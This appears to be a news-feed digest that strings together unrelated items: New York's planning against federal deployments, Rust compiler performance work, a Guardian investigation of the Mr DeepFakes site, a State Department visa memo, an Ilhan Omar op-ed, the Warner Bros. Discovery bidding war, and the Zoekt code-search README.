The approach has already led to criticism that the state is accommodating, and not fighting, what many regard as an increasingly harrowing example of authoritarianism. State officials respond that their approach is necessary to stop events from spiraling into the kind of escalation that could justify more federal deployments.
“I feel very lucky to not be an elected leader right now,” Bray told TPM.
Outreach
Gov. Kathy Hochul (D) directed Bray, a political appointee serving as director of New York State Division of Homeland Security and Emergency Services, over the summer to work out a plan that would avert the kind of splashy, violent federal presence that overtook Chicago, Los Angeles, and other cities.
For prevention, one model stands out: San Francisco.
There, Silicon Valley executives, along with Mayor Daniel Lurie (D), pleaded with Trump. They argued that a deployment would damage the economy. He replied by calling it off: “Friends of mine who live in the area called last night to ask me not to go forward with the surge,” he wrote on Truth Social.
That’s the plan that New York officials are trying to implement. They’ve convened groups of Wall Street leaders (Bray declined to say whether any had spoken to White House officials); both Hochul and New York City mayor-elect Zohran Mamdani have spoken with Trump directly.
Those meetings have resulted in something less than an adversarial relationship. As Trump shepherded Mamdani through an Oval Office press conference last month, the mayor-elect emphasized areas where the city and federal government could work together.
There are other
benefits that the state can provide
Trump, whose family business is still deeply rooted in New York. This week, a state gambling board
approved
licenses for three proposed casinos: one of them is set to be built on a golf course that belonged to the President. The move will net the Trump Organization $115 million.
Chicago and LA warnings
The deployments in Chicago and Los Angeles brought a level of brutality that, at first, helped to obscure their real aim.
The Trump administration cast them as immigration enforcement efforts, albeit with a new level of aggression. But after the White House used local, minor incidents of violence to justify sending troops in, the ICE and CBP operations started to strike observers as pretexts to stage larger-scale repression.
That prompted organizing between cities and states that had experienced the deployments and those that were next. New York’s Communications Workers of America organized one call in September titled “Learning From Chicago and LA and Preparing for Federal Escalation,” between elected officials in New York, Illinois, California, and elsewhere.
“We were just cautioning people to not lose the messaging war,” Hugo Martinez, a Los Angeles city councilmember on the call, told TPM. He said that the administration was seeking grounds to escalate, and that community leaders needed to “try to have as much control as possible over the response that the community has.”
Byron Sigcho-Lopez, a Chicago alderman, was on the call as well.
He took the message to heart. His community, Chicago’s Little Village, became an epicenter of CBP operations. One
video
that Byron-Lopez recorded of an October encounter with Bovino demonstrates how he internalized the approach: at several points, when demonstrators started to approach federal agents, Byron-Lopez would wave them off.
“They wanted to see escalation,” he told TPM last month.
Bray, the New York state commissioner, said that she had spoken to her counterparts in California and Illinois. For her, a few points became clear: litigation needed to start early. Local law enforcement needed to be prepared for the administration to direct federal authorities to stop communicating with them. Certain sites — like ICE detention facilities — became flashpoints.
Averted, but for how long?
The charm offensive has worked for now, state and city officials told TPM. But nobody can say how long that will last.
City officials are already taking some steps to prepare. The city sold a still-functional but out-of-use prison barge that was anchored near Rikers Island to a scrap company in Louisiana, removing 800 beds that the federal government could have seized for immigration enforcement. The city’s Economic Development Corporation, which is responsible for the project, declined to comment.
New York Attorney General Tish James’ office is preparing legal strategies and lawsuits to file that would challenge any National Guard deployment, one official told TPM.
Community organizers — some of whom have held calls with their counterparts in Chicago, LA, and elsewhere — are preparing as well.
They envision a campaign of resistance that will start with measures already in place, like flyers calling for people to report ICE and CBP operations. That information is then relayed to a network of people who can mobilize in response, organizing through messaging apps and staging spontaneous protests like one that appeared in Manhattan over the weekend and corralled federal agents for roughly two hours.
On the less risky end, that can mean mutual aid programs to provide legal and other forms of support. But some organizers also want to see more disruption. Jasmine Gripper, a state director of the Working Families Party, was on the call with local officials from LA and Chicago. Gripper told TPM that she envisioned a series of tactics that she described as “not letting ICE be at peace in our city.” That means persuading restaurant owners to refuse to serve immigration agents, following agents around with large bullhorns announcing their presence, and finding out where they’re staying and making loud noises at night.
“How do we disrupt at every level and have peaceful resistance and noncompliance to ICE being in our communities and what best can keep our folks safe?” she said.
Bray, the New York State emergency and homeland security commissioner, told TPM that she’s devoting around half of her schedule to trying to avert a federal escalation and to planning for one if it does happen.
The aggression in federal operations in Chicago shocked her, she said. Federal agents walked around in fatigues, unidentified while wearing masks, as if they were an occupying foreign power. In one incident in Chicago, law enforcement rappelled from a helicopter into a dilapidated apartment building for a showy immigration raid.
“Why? Tell me what the strategic, tactical, operational, requirement for that is?” Bray asked.
It’s illegal to block federal agents from doing their job, Bray said. The overriding risk is that things spiral out of control. In California, federal law enforcement cut off communication with local cops as operations there ramped up. Bray told TPM that the state will do what it can to make sure that those lines of communication stay open, even when that means having police prevent demonstrators from blocking federal agents.
“You get images where people will say to me, ‘well, wait a second, look, isn’t that the NYPD helping?’ No, they’re not helping,” Bray said. “They’re doing crowd control. They’re making sure that there aren’t violent clashes in front of a government building. That’s their job. That’s not cooperation with feds. But, you know, this is gonna test us all.”
Josh Kovensky
is an investigative reporter for Talking Points Memo, based in New York. He previously worked for the Kyiv Post in Ukraine, covering politics, business, and corruption there.
]
How to speed up the Rust compiler in December 2025
It has been more than six months since my
last
post
on the Rust compiler’s performance. In that time I
lost one
job
and
gained another
. I
have less time to work directly on the Rust compiler than I used to, but I am
still doing some stuff, while also working on
other interesting
things
.
Compiler improvements
#142095
: The compiler has a
data structure called
VecCache
which is a key-value store used with keys that
are densely-numbered IDs, such as
CrateNum
or
LocalDefId
. It’s a segmented
vector with increasingly large buckets added as it grows. In this PR
Josh
Triplett
optimized the common case when the
key is in the first segment, which holds 4096 entries. This gave icount
reductions across many benchmark runs, beyond 4% in the best cases.
#148040
: In this PR
Ben
Kimock
added a fast path for lowering trivial
consts. This reduced compile times for the
libc
crate by 5-15%! It’s unusual
to see a change that affects a single real-world crate so much, across all
compilation scenarios: debug and release, incremental and non-incremental.
This is a great result. At the time of writing,
libc
is the #12 mostly
popular crate on crates.io as measured by “recent downloads”, and #7 as
measured by “all-time downloads”. This change also reduced icounts for a few
other benchmarks by up to 10%.
#147293
: In the query system
there was a value computed on a hot path that was only used within a
debug!
call. In this PR I avoided doing that computation unless necessary, which gave
icount reductions across many benchmark results, more than 3% in the best case.
This was such a classic micro-optimization that I added it as an example to the
Logging and
Debugging
chapter of the
The Rust Performance
Book
.
#148706
: In this PR
dianne
optimized the handling of temporary scopes.
This reduced icounts on a number of benchmarks, 3% in the best case. It also
reduced peak memory usage on some of the secondary benchmarks containing very
large literals, by 5% in the best cases.
#143684
: In this PR
Nikita
Popov
upgraded the LLVM version used by the compiler
to LLVM 21. In recent years every LLVM update has improved the speed of the
Rust compiler. In this case the mean icount reduction across all benchmark
results was an excellent
1.70%
,
and the mean cycle count reduction was
0.90%
,
but the mean wall-time saw an increase of
0.26%
.
Wall-time is the true metric, because it’s what users perceive, though it has
high variance. icounts and cycles usually correlate well to wall-time,
especially on large changes like this that affect many benchmarks, though this
case is a counter-example. I’m not quite sure what to make of it; I don’t know
whether the wall-time results on the test machine are representative.
#148789
: In this PR
Mara
Bos
reimplemented
format_args!()
and
fmt::Arguments
to be more space-efficient. This gave lots of small icount
wins, and a couple of enormous (30-38%) wins for the
large-workspace
stress
test. Mara wrote about this
on
Mastodon
. She also has written
about prior work on formatting on
her blog
and in
this tracking issue
.
Lots of great reading there for people who love nitty-gritty optimization
details, including nice diagrams of how data structures are laid out in memory.
Proc macro wins in Bevy
In June I
added
a new compiler flag
-Zmacro-stats
that measures how much code is generated by
macros. I
wrote
previously
about how I used it to optimize
#[derive(Arbitrary)]
from the
arbitrary
crate used for fuzzing.
I also used it to streamline the code generated by
#[derive(Reflect)]
in
Bevy
. This derive is used to implement reflection on many
types and it produced a
lot
of code. For example, the
bevy_ui
crate was
around 16,000 lines and 563,000 bytes of source code. The code generated by
#[derive(Reflect)]
for types within that crate was around 27,000 lines and
1,544,000 bytes. Macro expansion almost quadrupled the size of the code, mostly
because of this one macro!
After doing this I measured the
bevy_window
crate. The size of the code
generated by
#[derive(Reflect)]
was reduced by 39%, which reduced
cargo
check
wall-time for that crate by 16%, and peak memory usage by 5%. And there
are likely similar improvements across many other crates within Bevy, as well
as programs that use
#[derive(Reflect)]
themselves.
It’s understandable that the generated code was suboptimal. Proc macros aren’t
easy to write; there was previously no easy way to measure the size of the
generated code; and the generated code was considered good enough because (a)
it worked, and (b) the compiler would effectively optimize away all the
redundancies. But in general it is more efficient to optimize away redundancies
at the generation point, where context-specific and domain-specific information
is available, rather than relying on sophisticated optimization machinery
further down the compilation pipeline that has to reconstruct information. And
it’s just less code to parse and represent in memory.
rustdoc-json
At RustWeek 2025 I had a conversation with
Predrag
Gruevski
about
rustdoc-json
(invoked with the
--output-format=json
flag) and its effects on the performance of
cargo-semver-checks
. I spent
some time looking into it and found one nice win.
#142335
: In this PR I reduced
the number of allocations done by rustdoc-json. This gave wall-time reductions
of up to 10% and peak memory usage reductions of up to 8%.
I also tried various other things to improve rustdoc-json’s speed, without much
success. JSON is simple and easy to parse, and rustdoc-json’s schema for
representing Rust code is easy for humans to read. These features are great for
newcomers and people who want to experiment. It also means the JSON output is
space-inefficient, which limits the performance of heavy-duty tools like
cargo-semver-checks that are designed for large codebases. There are some
obvious space optimizations that could be applied to the JSON schema, like
shortening field names, omitting fields with default values, and interning
repeated strings. But these all affect its readability and flexibility.
The right solution here is probably to introduce a performance-oriented second
format for the heavy-duty users.
#142642
is a draft attempt at
this. Hopefully progress can be made here in the future.
Faster compilation of large API crates
Josh Triplett introduced a new experimental flag,
-Zhint-mostly-unused
, which
can give big compile time wins for people using small fractions of very large
crates. This is typically the case for certain large API crates, such as
windows
,
rustix
, and
aws-sdk-ec2
. Read about it
here
.
Faster Rust builds on Mac
Did you know that macOS has a secret setting that can make Rust builds faster?
No joke!
General progress
Progress since May must be split into two parts, because in July we changed the machine
on which the measurements are done.
The
first
period
(2025-05-20 to 2025-06-30) was on the old machine.
The
second period
(2025-07-01 to 2025-12-03) was on the new machine.
The mean wall-time changes were moderate improvements (-3.19% and -2.65%). The
mean peak memory usage changes were a wash (+1.18% and -1.50%). The mean binary
size changes were small increases (0.45% and 2.56%).
It’s good that wall-times went down overall, even if the other metrics were
mixed. There is a slow but steady stream of bug fixes and new features to the
compiler, which often hurt performance. In the absence of active performance
work the natural tendency for a compiler is to get slower, so I view even small
improvements as a win.
The new machine reduced wall-times by about 20%. It’s worth upgrading your
hardware, if you can!
‘It was about degrading someone completely’: the story of Mr DeepFakes – the world’s most notorious AI porn site
Guardian
www.theguardian.com
2025-12-05 05:00:42
The hobbyists who helped build this site created technology that has been used to humiliate countless women. Why didn’t governments step in and stop them? For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a li...
For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a link, which took her to a site called Mr DeepFakes. There, she found fake images of herself, naked, squatting, chained, performing sex acts with various animals. They were tagged “Patrizia Schlosser sluty FUNK whore” (sic).
“They were very graphic, very humiliating,” says Schlosser, a German journalist for Norddeutscher Rundfunk (NDR) and
Funk
. “They were also very badly done, which made it easier to distance myself, and tell myself they were obviously fake. But it was very disturbing to imagine somebody somewhere spending hours on the internet searching for pictures of me, putting all this together.”
The site was new to Schlosser, despite her previous high-profile investigations into the porn industry. “I’d never heard of Mr DeepFakes – a porn site entirely dedicated to fake porn videos and photos. I was surprised by how big it was – so many videos of every celebrity you know.” Schlosser’s first reaction on seeing herself among them was to brush it aside. “I tried to push it to the back of my mind, which was really a strategy of not dealing with it,” she says. “But it’s strange how the brain works. You know it’s fake but still you see it. It’s not you but also it is you. There you are with a dog and a chain. You feel violated but confused. At some point, I decided: ‘No. I’m angry. I don’t want those images out there.’”
Schlosser’s subsequent documentary for NDR’s STRG_F programme did succeed in getting the images removed. She also tracked down the young man who had created and posted them – even visiting his home and speaking to his mother. (The perpetrator himself wouldn’t come out of his bedroom.) However, Schlosser was unable to identify “Mr DeepFakes” – or whoever was behind the site, despite enlisting the help of Bellingcat, the online investigative journalism collective. Bellingcat’s Ross Higgins was on the team. “My background is investigating money laundering,” he says. “I looked at the structure of the website and it was using the same internet service providers (ISPs) as proper serious organised criminals.” The ISPs suggested links to the Russian mercenary group Wagner, and individuals named in the
Panama Papers
. The ads it carried included ones for apps owned by Chinese technology companies, which allowed China’s government access to all customer data. “I made the presumption that this was all much too sophisticated to be a site of hobbyists,” says Higgins.
It turned out that’s exactly what it was.
The story of Mr DeepFakes, the world’s largest, most notorious nonconsensual deepfake porn site, is really the story of AI porn itself – the very term “deepfake” is believed to have come from its originator. A “ground zero” for AI-generated pornography, its pages – which have been viewed more than 2bn times – have depicted countless female celebrities, politicians, European princesses, wives and daughters of US presidents, being kidnapped, tortured, shaved, bound, mutilated, raped and strangled. Yet all this content (which would take more than 200 days to watch) was just the site’s “shop window”. Its true heart, it’s “engine room”, was its forum. Here, anyone wanting deepfakes created of someone they knew (a girlfriend, sister, classmate or colleague) could find someone willing to make them to order for the right price. It was also a “training ground”, a technical hub where “hobbyists” taught one another, shared tips, posted academic papers and “problem-solved”. (One recurring problem was how to deepfake without a good “dataset”. This means when you’re trying to deepfake someone you don’t have many pictures of – so not a celebrity, but maybe someone you know whose social media you’ve screengrabbed.)
The film-maker and activist Sophie Compton spent many hours monitoring Mr DeepFakes while researching the award-winning 2023 documentary Another Body (available on iPlayer). “Looking back, I think that site played such an instrumental role in the proliferation of deepfakes overall,” she says. “I really think that there’s a world in which the site didn’t get made, wasn’t allowed to be made or was shut down quickly, and deepfake porn is just a fraction of the issue that we have today. Without that site, I don’t think it would have exploded in the way it did.”
In fact, that scenario was entirely possible. The origins of Mr
Deepfakes stretch back to 2017-18 when AI porn was just beginning to build on social media sites such as Reddit. One anonymous Redditor and AI porn “pioneer” who went by the name of “deepfakes” (and is thus credited with coining the term) gave an
early interview
to Vice about its potential. Shortly after, though, in early 2018,
Reddit banned deepfake porn
from its site. “We have screenshots from their message boards at that time and the deepfake community, which was small, was freaking out and jumping ship,” says Compton. This is when Mr DeepFakes was created, with the early domain name dpfks.com. The administrator carried the same username – dpfks – and was the person who advertised for volunteers to work as moderators, and posted rules and guidelines, as well as deepfake videos and an in-depth guide to using software for deepfake porn.
“What’s so depressing about reading the messages and seeing the genesis is realising how easily governments could have stopped this in its tracks,” says Compton. “The people doing it didn’t believe they were going to be allowed free rein. They were saying: ‘They’re coming for us!’, ‘They’re never going to let us do this!’ But as they continued without any problems at all, you see this growing emboldenment. Covid added to the explosion as everyone stopped moderating content. The output was violent – it was about degrading someone completely. The celebrities that were really popular were often really young – Emma Watson, Billie Eilish, Millie Bobby Brown.” (Greta Thunberg is another example here.)
Who was behind it? From time to time, Mr DeepFakes gave anonymous interviews. In a 2022 BBC documentary,
Deepfake
Porn: Could You Be Next?, the site’s “owner” and “web developer”, going by the pseudonym “deepfakes”, made the argument that consent from the women wasn’t required as “it’s a fantasy, it’s not real”.
Was money their motivation? Mr DeepFakes ran ads and had a premium membership paid in cryptocurrency – in 2020, one forum mentions that it made between $4,000 and
$7,000 a month. “There was a commercial aspect,” says Higgins. “It was a side hustle, but it was more than that. It gave this notoriety.”
At one point, the site “posted 6,000 pictures of AOC’s [the US politician Alexandria Ocasio-Cortez’s]
face in order that people could make deepfake pornography of her,” says Higgins. “It’s insane. [There were] all these files of YouTubers and politicians. What it’s saying is that if you’re a woman in this world you can only achieve so much because if you put your head above the parapet, if you have the temerity to do anything publicly, you can expect your image to be used in the most degrading way possible for personal profit.
“The most affecting thing for me was the language used about women on that site,” he continues. “We had to change it for our online report because we didn’t want it to be triggering, but this is pure misogyny. Pure hatred.”
This April, investigators began to believe that they had found Mr DeepFakes and sent emails to their suspect.
On 4 May, Mr DeepFakes shut down. A notice on its homepage blamed “data loss” caused by the withdrawal of a “critical service provider”. “We will not be relaunching,” it continued. “Any website claiming this is fake. This domain will eventually expire and we are not responsible for future use. This message will be removed in about a week.”
Mr DeepFakes is finished – but according to Compton, this could have happened so much sooner. “All the signs were there,” she says. The previous year, in April 2024, when the UK government
announced plans to
criminalise the creation and sharing of deepfake sexual abuse material
, Mr DeepFakes responded by immediately blocking access to UK users. (The plans were later shelved when the 2024 election was called.) “It showed that ‘Mr DeepFakes’ was obviously not so committed that there was nothing governments could do,” says Compton. “If it was going to become too much of a pain and a risk to run the site, then they weren’t going to bother.”
But deepfake porn has become so popular, so mainstream, that it no longer requires a “base camp”. “The things that those guys prided themselves on learning how to do and teaching others are now so embedded, they’re accessible to anyone on apps at the click of the button,” says Compton.
And for those wanting something more complex, the creators, the self-styled experts who once lurked on its forum, are now out there touting for business. Patrizia Schlosser knows this for sure. “As part of my research, I went undercover and reached out to some of the people on the forums, asking for a deepfake of an ex-girlfriend,” says Schlosser. “Although it’s often claimed the site was only about celebrities, that wasn’t true. The response was, ‘Yeah, sure …’
“After Mr DeepFakes shut down, I got an automatic email from one of them which said: “If you want anything made, let me know … Mr DeepFakes is down – but of course, we keep working.”
The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo.
Kevin Dietsch/Getty Images
hide caption
toggle caption
Kevin Dietsch/Getty Images
The State Department is instructing its staff to reject visa applications from people who worked on fact-checking, content moderation or other activities the Trump administration considers "censorship" of Americans' speech.
The directive, sent in an internal memo on Tuesday, is focused on applicants for H-1B visas for highly skilled workers, which are frequently used by tech companies, among other sectors. The memo was first reported by
Reuters
; NPR also obtained a copy.
"If you uncover evidence an applicant was responsible for, or complicit in, censorship or attempted censorship of protected expression in the United States, you should pursue a finding that the applicant is ineligible" for a visa, the memo says. It refers to a policy
announced by Secretary of State Marco Rubio
in May restricting visas from being issued to "foreign officials and persons who are complicit in censoring Americans."
The Trump administration has been highly
critical
of tech companies' efforts to police what people are allowed to post on their platforms and of the broader field of trust and safety, the tech industry's term for teams that focus on preventing abuse, fraud, illegal content, and other harmful behavior online.
President Trump was banned from multiple social media platforms in the aftermath of his supporters' attack on the Capitol on Jan. 6, 2021. While those bans have since been lifted, the president and members of his administration frequently cite that experience as evidence for their
claims
that tech companies unfairly target conservatives — even as many tech leaders have
eased their policies
in the face of that
backlash
.
Tuesday's memo calls out H-1B visa applicants in particular "as many work in or have worked in the tech sector, including in social media or financial services companies involved in the suppression of protected expression."
It directs consular officers to "thoroughly explore" the work histories of applicants, both new and returning, by reviewing their resumes, LinkedIn profiles, and appearances in media articles for activities including combatting misinformation, disinformation or false narratives, fact-checking, content moderation, compliance, and trust and safety.
"I'm alarmed that trust and safety work is being conflated with 'censorship'," said Alice Goguen Hunsberger, who has worked in trust and safety at tech companies including OpenAI and Grindr.
"Trust and safety is a broad practice which includes critical and life-saving work to protect children and stop CSAM [child sexual abuse material], as well as preventing fraud, scams, and sextortion. T&S workers are focused on making the internet a safer and better place, not censoring just for the sake of it," she said. "Bad actors that target Americans come from all over the world and it's so important to have people who understand different languages and cultures on trust and safety teams — having global workers at tech companies in [trust and safety] absolutely keeps Americans safer."
In a statement, a State Department spokesperson who declined to give their name said the department does not comment on "allegedly leaked documents," but added: "the Administration has made clear that it defends Americans' freedom of expression against foreigners who wish to censor them. We do not support aliens coming to the United States to work as censors muzzling Americans."
The statement continued: "In the past, the President himself was the victim of this kind of abuse when social media companies locked his accounts. He does not want other Americans to suffer this way. Allowing foreigners to lead this type of censorship would both insult and injure the American people."
First Amendment experts criticized the memo's guidance as itself a potential violation of free speech rights.
"People who study misinformation and work on content-moderation teams aren't engaged in 'censorship'— they're engaged in activities that the First Amendment was designed to protect. This policy is incoherent and unconstitutional," said Carrie DeCell, senior staff attorney and legislative advisor at the Knight First Amendment Institute at Columbia University, in a statement.
Even as the administration has targeted those it claims are engaged in censoring Americans, it has also tightened its own scrutiny of
visa applicants' online speech
.
On Wednesday, the State Department
announced
it would require H-1B visa applicants and their dependents to set their social media profiles to "public" so they can be reviewed by U.S. officials.
NPR's Bobby Allyn and Michele Kelemen contributed reporting.
Trump Knows He’s Failing. Cue the Bigotry.
Portside
portside.org
2025-12-05 04:39:41
Trump Knows He’s Failing. Cue the Bigotry.
jay
Thu, 12/04/2025 - 23:39
...
Photo credit: Farah Abdi Warsameh/Associated Press // New York Times
On Tuesday, President Trump
called
my friends and me “garbage.”
This comment was only the latest in a series of remarks and Truth Social posts in which the president has demonized and spread conspiracy theories about the Somali community and about me personally. For years, the president has spewed hate speech in an effort to gin up contempt against me. He reaches for the same playbook of racism, xenophobia, Islamophobia and division again and again. At one 2019 rally, he egged on his crowd
until it chanted
“send her back” when he
said my name
.
Mr. Trump denigrates not only Somalis but so many other immigrants, too, particularly those who are Black and Muslim. While he has consistently tried to vilify newcomers, we will not let him silence us. He fails to realize how deeply Somali Americans love this country. We are doctors, teachers, police officers and elected leaders working to make our country better. Over 90 percent of Somalis living in my home state, Minnesota, are American citizens by birth or naturalization. Some even supported Mr. Trump at the ballot box.
“I don’t want them in our country,” the president said this week. “Let them go back to where they came from.”
Somali Americans remain resilient against the onslaught of attacks from the White House. But I am deeply worried about the ramifications of these tirades. When Mr. Trump maligns me, it increases the number of death threats that my family, staff members and I receive. As a member of Congress, I am privileged to have access to security when these threats arise. What keeps me up at night is that people who share the identities I hold — Black, Somali, hijabi, immigrant — will suffer the consequences of his words, which so often go unchecked by members of the Republican Party and other elected officials. All Americans have a duty to call out this hateful rhetoric when we hear it.
The president’s dehumanizing and dangerous attacks on minority immigrant communities are nothing new. When he first ran for president a decade ago, he launched his campaign with claims that he was going to pause Muslim immigration to this country. He has since falsely accused Haitian migrants of eating pets and referred to Haiti and African nations as “shithole” countries. He has accused Mexico of sending rapists and drug peddlers across our border. It is unconscionable that he fails to acknowledge how this country was built on the backs of immigrants and mocks their ongoing contributions.
While the president wastes his time attacking my community,
my state, my governor
and me, the promises of economic prosperity he made in his run for president last year have not come to fruition. Prices have not come down; in many cases, they have risen. His implementation of tariffs has hurt farmers and small business owners. His policies have only worsened the affordability crisis for Americans. And now, with Affordable Care Act tax credits set to expire, health care costs for American households are primed to skyrocket, and millions of people risk losing their coverage under his signature domestic policy bill.
The president knows he is failing, and so he is reverting to what he knows best: trying to divert attention by stoking bigotry.
When I was sworn into Congress in 2019, my father turned to me and expressed bewilderment that the leader of the free world was picking on a freshman member of Congress, one out of 535 members of the legislative body. The president’s goal may have been to try to tear me down, but my community and my constituents rallied behind me then, just as they are now.
I often say that although Minnesota may be cold, the people here have warm hearts. Minnesota is special. That is why when so many Somalis arrived in this country, they chose the state as home. I am deeply grateful to the people of Minnesota for the generosity, hospitality and support they have shown to every immigrant community in our state.
We will not let Mr. Trump intimidate or debilitate us. We are not afraid. After all, Minnesotans not only welcome refugees, they also sent one to Congress.
Netflix has submitted the highest bid to date for Warner Bros. Discovery’s studio and streaming assets, according to people familiar with the secretive bidding process.
Netflix’s most recent offer, submitted on Thursday, valued the Warner Bros. studio, HBO Max streaming service and related parts of the company at around $28 per share, sources said.
Paramount also submitted a new bid on Thursday, closer to $27 per share, one of the sources added.
The two offers aren’t apples-to-apples, however, because Paramount has been trying to buy all of Warner Bros. Discovery, including CNN and other cable channels, while Netflix and another bidder, Comcast, have only shown interest in the studio and streaming assets.
The mega-media bidding war has intensified in recent days, captivating a wide swath of Hollywood and garnering attention from the Trump White House. Iconic brands like HBO and DC Comics hang in the balance.
Representatives for the companies involved have declined to comment. But leaks out of what is supposed to be a confidential process suggest that Netflix now has the pole position.
Paramount certainly perceives it that way; the company’s attorneys wrote to Zaslav expressing “grave concerns” about the auction process.
Specifically, Paramount’s attorneys charged that WBD has “embarked on a myopic process with a predetermined outcome that favors a single bidder,” meaning Netflix.
Analysts said the letter could be a precursor to a hostile-takeover play by Paramount, which has moved aggressively in recent months under new CEO David Ellison’s leadership.
Late Thursday, Bloomberg reported that WBD and Netflix have entered exclusive talks.
Ellison kickstarted the auction process earlier in the fall by submitting multiple bids to WBD CEO David Zaslav and the company’s board.
Analysts at the time predicted that a bidding war would break out, and that’s exactly what has happened, given that famed movie and TV studios rarely come onto the market.
Zaslav officially put up the for-sale sign in October. At the same time, he said that WBD’s previously announced plan to split the company into two publicly traded halves would continue to be pursued.
The WBD board had been under pressure to do something, since the company’s stock plummeted after it was formed through a 2022 merger, from roughly $25 a share to a low of $7.52.
The split plan helped to rejuvenate WBD’s shares earlier this year, and then word of Paramount’s offers sent the stock skyrocketing back toward $25.
Sources in Ellison’s camp have emphasized that Paramount would be disciplined in its pursuit of the Warner assets.
Meanwhile, people in Zaslav’s camp have argued that the proposed split was the best way to realize the value of all of WBD.
If the split still takes effect next year, the Warner Bros. half would house HBO Max and the movie studio, and the Discovery Global half would house CNN and other cable channels.
Paramount may have been trying to get ahead of the split by making unsolicited bids for the whole company.
Ellison’s pursuit is audacious, to be sure: Paramount’s market cap is currently one-fourth the size of WBD’s market cap.
But Ellison and his management team have been moving fast to revitalize Paramount and disprove skeptics across Hollywood.
It’s impossible to make sense of the WBD bidding war without understanding the “Trump card.”
Ellison and Paramount are perceived to have a mutually beneficial relationship with President Trump and the White House — and thus an advantage in getting any deal approved by the Trump administration. “That’s the Trump card,” an Ellison adviser remarked to CNN in October.
Past administrations proudly insisted that agencies like the Department of Justice, which enforces antitrust law, were independent of the president. Trump has replaced those norms with a new, overtly transactional approach.
Trump has repeatedly praised Ellison and his father Larry, Oracle’s executive chairman, who is a key player in Trump’s dealings with TikTok.
“They’re friends of mine. They’re big supporters of mine,” the president said in mid-October.
Numerous Republican lawmakers have also cheered the Ellison takeover of CBS and the rest of Paramount, especially the installation of Bari Weiss as editor in chief of CBS News.
Ellison has been both credited and criticized for forging a relationship with Trump’s inner circle this year despite donating nearly $1 million to Joe Biden’s reelection campaign last year.
Just a couple of weeks ago, Ellison landed an invitation to Trump’s White House dinner for Saudi Crown Prince Mohammed bin Salman.
What some have seen as savvy business practices, others have seen as media capitulation. And Ellison has stayed mostly quiet about the matter.
On Wednesday he was scheduled to appear at the DealBook Summit, an annual conference hosted by The New York Times in Manhattan. But he withdrew from the summit amid the negotiations with WBD and was later spotted back in Washington, D.C. for talks with officials there.
During the WBD bidding process, Paramount executives have bluntly argued that their offer will pass muster with Trump administration regulators while rival offers will not.
After all, any proposed sale could be held up for months, and even years, in Washington, either by Trump loyalists carrying out his wishes or by bureaucrats with genuine objections to media consolidation.
But Trump does not get a literal veto. When the Justice Department in 2017 sued to stop AT&T’s merger with Time Warner, a forerunner to WBD, the companies fought the case in court and prevailed.
Some Wall Street analysts have asserted that Netflix may be willing to stomach a similar legal battle.
Plus, Washington is not the only regulatory battleground that media companies have to worry about.
A WBD sale, in whole or in part, would face scrutiny in the United Kingdom, the European Union and some Latin American countries. Sources previously told CNN that the perception of Trump clearing the way for the Ellisons in the US could hurt them in other markets.
Media reports about Netflix emerging as the frontrunner for WBD’s studio and streaming assets have prompted some Republican elected officials to raise alarms about the prospective combination.
“Learning about Netflix’s ambition to buy its real competitive threat — WBD’s streaming business — should send alarm to antitrust enforcers around the world,” Sen. Mike Lee wrote on X. “This potential transaction, if it were to materialize, would raise serious competition questions — perhaps more so than any transaction I’ve seen in about a decade.”
A recent Bank of America analyst report put it this way: “If Netflix acquires Warner Bros., the streaming wars are effectively over. Netflix would become the undisputed global powerhouse of Hollywood beyond even its currently lofty position.”
Thoughts on Go vs. Rust vs. Zig
Simon Willison
simonwillison.net
2025-12-05 04:28:05
Thoughts on Go vs. Rust vs. Zig
Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.
One thing that I hadn't noticed before is that none of these three languages implement class-based OOP...
Thoughts on Go vs. Rust vs. Zig
(
via
) Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.
One thing that I hadn't noticed before is that none of these three languages implement class-based OOP.
"Zoekt, en gij zult spinazie eten" - Jan Eertink
("seek, and ye shall eat spinach" - My primary school teacher)
Zoekt is a text search engine intended for use with source
code. (Pronunciation: roughly as you would pronounce "zooked" in English)
Note:
This has been the maintained source for Zoekt since 2017, when it was forked from the
original repository
github.com/google/zoekt
.
Background
Zoekt supports fast substring and regexp matching on source code, with a rich query language
that includes boolean operators (and, or, not). It can search individual repositories, and search
across many repositories in a large codebase. Zoekt ranks search results using a combination of code-related signals
like whether the match is on a symbol. Because of its general design based on trigram indexing and syntactic
parsing, it works well for a variety of programming languages.
The two main ways to use the project are
Through individual commands, to index repositories and perform searches through Zoekt's
query language
Or, through the indexserver and webserver, which support syncing repositories from a code host and searching them through a web UI or API
Note
: It is also recommended to install
Universal ctags
, as symbol
information is a key signal in ranking search results. See
ctags.md
for more information.
Command-based usage
Zoekt supports indexing and searching repositories on the command line. This is most helpful
for simple local usage, or for testing and development.
Indexing a local git repo
go install github.com/sourcegraph/zoekt/cmd/zoekt-git-index
$GOPATH/bin/zoekt-git-index -index ~/.zoekt /path/to/repo
Indexing a local directory (not git-specific)
go install github.com/sourcegraph/zoekt/cmd/zoekt-index
$GOPATH/bin/zoekt-index -index ~/.zoekt /path/to/repo
Searching an index
go install github.com/sourcegraph/zoekt/cmd/zoekt
$GOPATH/bin/zoekt 'hello'
$GOPATH/bin/zoekt 'hello file:README'
Zoekt services
Zoekt also contains an index server and web server to support larger-scale indexing and searching
of remote repositories. The index server can be configured to periodically fetch and reindex repositories
from a code host. The webserver can be configured to serve search results through a web UI or API.
This will fetch all repos under 'github.com/apache', then index the repositories. The indexserver takes care of
periodically fetching and indexing new data, and cleaning up logfiles. See
config.go
for more details on this configuration.
Starting the web server
go install github.com/sourcegraph/zoekt/cmd/zoekt-webserver
$GOPATH/bin/zoekt-webserver -index ~/.zoekt/
If you start the web server with
-rpc
, it exposes a
simple JSON search
API
at
http://localhost:6070/api/search
.
The JSON API supports advanced features including:
Streaming search results (using the
FlushWallTime
option)
Alternative BM25 scoring (using the
UseBM25Scoring
option)
Context lines around matches (using the
NumContextLines
option)
Finally, the web server exposes a gRPC API that supports
structured query objects
and advanced search options.
Acknowledgements
Thanks to Han-Wen Nienhuys for creating Zoekt. Thanks to Alexander Neubeck for
coming up with this idea, and helping Han-Wen Nienhuys flesh it out.
